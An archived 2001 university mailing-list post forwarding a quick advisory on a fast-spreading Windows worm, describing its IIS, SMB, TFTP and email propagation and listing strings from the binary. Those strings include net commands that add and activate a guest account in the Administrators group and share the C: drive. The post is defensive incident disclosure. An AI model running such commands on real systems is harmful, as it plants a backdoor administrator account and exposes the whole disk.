LISTSERV - NETANN-L Archives

From: Christopher Misra <[log in to unmask]>
To: [log in to unmask]
Subject: [unisog] Concept Virus(CV) V.5 - Advisory and Quick analysis (fwd)
Date: Tue, 18 Sep 2001 15:44:00 GMT
X-Mailer: CorporateTime Outlook Connector 3.1 (R.3.1.3.0815)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

Hi,

Forwarded from the incidents list at securityfocus. =


                                - Chris
------- Forwarded Message

Message-ID: <[log in to unmask]>
Date: Tue, 18 Sep 2001 16:47:00 +0200
From: Olle Segerdahl <[log in to unmask]>
X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: [log in to unmask], [log in to unmask]
Subject: Concept Virus(CV) V.5 - Advisory and Quick analysis
Content-Type: text/plain; charset=3Dus-ascii
Content-Transfer-Encoding: 7bit
--

Hi all!


We've all just been hit by a VERY aggressive worm/virus.

Quick analysis indicates that it propagates itself in
a number of different ways:

Through use of IIS UNICODE direcory traversal coupled
with the recent IIS .dll privilege escalation attack.
It uses SMB/CIFS and TFTP to get the worm payload.

Through MAPI mails (probably to all of addressbook).

Other ways of spreading may be possible, but we haven't =

yet had the time to properly analyse the worm/virus.

It seems to share "c:\" via SMB/CIFS as "c$" and
the worm/virus also adds the "Guest" user and "Guests"
group to the local "Administrators" group....


Interesting strings in binary:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=3Dc:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net


More info as we come upon it.....

/olle

- -------------------------------------------------------------------------=
---
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management =

and tracking system please see: http://aris.securityfocus.com


------- End of Forwarded Message


-- =

Christopher Misra                                    Network Analyst =

OIT/Network Systems and Services                        LGRC A153
University of Massachusetts                         Amherst, MA  01003
E-mail: [log in to unmask]